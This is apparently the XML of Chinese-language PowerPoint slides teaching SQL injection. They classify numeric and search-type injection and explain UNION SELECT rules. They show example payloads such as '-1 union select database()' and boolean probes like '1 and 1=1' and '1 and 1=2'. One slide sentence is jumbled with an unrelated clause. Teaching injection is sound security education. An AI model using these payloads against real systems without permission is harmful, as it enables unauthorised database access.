          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6717594" y="3798748"/>
            <a:ext cx="1602774" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>搜索型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68ACDDAB-3A1F-4AAA-A893-D1F2D9893E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600703" y="3765488"/>
            <a:ext cx="6186959" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句拼接用户输入处的前后构造不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604727461"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438429" y="407896"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据。中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021623" y="701566"/>
            <a:ext cx="6480007" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入分类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>数值型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E18CD03-08D8-45DC-BEE7-56F06037A00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573853" y="1432003"/>
            <a:ext cx="4178973" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代表语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网站页面切换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888F102C-3A40-4FA4-B695-F464B70910CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373596" y="1982053"/>
            <a:ext cx="5149167" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>Select xxx from user where id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C234BB-ED5B-41F3-A070-79DF5955EB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213783" y="2664713"/>
            <a:ext cx="4559261" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>=-1 union select database()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB07DD8B-3815-47F4-A159-3D5A41C16FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213783" y="3254078"/>
            <a:ext cx="9793065" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" err="1"/>
              <a:t>xxx,xxx,xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t> from user where id= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1 union select database()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5903D18F-ED83-4F4E-BE04-F8276B6FC8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490221" y="4320497"/>
            <a:ext cx="1145148" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>验证：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20A73A35-3434-4E74-92D1-701F40357989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799620" y="4728393"/>
            <a:ext cx="4857950" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>① 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= '                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F9088DA-F264-4B1B-893B-E5298917AC90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799620" y="5140694"/>
            <a:ext cx="6454670" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>② 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 1 and 1=1     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>页面与①不同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B64289-126B-4EAD-A74C-A7A46D69B22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799620" y="5581792"/>
            <a:ext cx="6454670" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③ 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 1 and 1=2     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>页面与②不同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1467958428"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
